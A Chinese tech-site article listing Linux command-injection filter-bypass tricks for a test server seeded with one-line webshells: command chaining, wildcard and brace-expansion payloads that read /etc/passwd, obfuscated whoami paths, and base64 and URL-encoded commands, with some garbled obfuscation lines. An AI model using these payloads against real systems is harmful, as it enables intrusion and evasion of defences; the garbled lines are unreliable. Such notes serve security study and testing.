Linux命令执行Bypass常见姿势
描述
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01实践演示
部署服务器端为Linux系统的http服务,留存get和post方式的一句话木马,用于命令执行测试。(测试思路可以对话Chatgpt)
linux逻辑运算符
; //分号
| //仅执行后面那条命令
|| //仅执行前面那条命令
& //两条命令都会执行
%0a //换行符 %0d //回车符
利用通配符
通配符"?"代表任意一个字符,"*"代表任意个字符
cat%20/etc/pa??wd
cat%20/etc/pa?*wd
尝试
cat /*****et*c*/*pas**************************************************swd
结合上述方式进行组合bypass
echo mt ; whoami
使用大括号来绕过空格的限制
{cat,/etc/passwd}
{ls,-alth}
命令混淆
whoami
1oami
@ami
*mi
命令变形
/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i
base64编码方式进行
echo id|base64
echo id|base64
URL编码
%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b
审核编辑 :李倩
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。
举报投诉
-
bypass电容多大 bypass电容怎么计算2024-02-14 5856
-
uboot命令的执行过程是什么2023-12-04 1740
-
linux重启命令有哪些2023-11-17 3761
-
shell命令和linux命令一样吗2023-11-08 4125
-
常用linux网络排查命令2023-06-25 1375
-
Linux命令执行Bypass常见姿势介绍2023-05-22 3097
-
如何在Linux使用touch命令2022-12-05 3114
-
linux技术:WAF运行命令执行方法2022-11-07 1807
-
学习常见的Linux命令2021-11-05 998
-
Linux常见的命令有哪些2021-10-28 1505
-
嵌入式Linux开发教程:Linux常见命令(上篇)2021-10-21 953
-
Linux中命令链接操作符的实际应用2019-05-06 1256
全部0条评论
快来发表一下你的评论吧 !
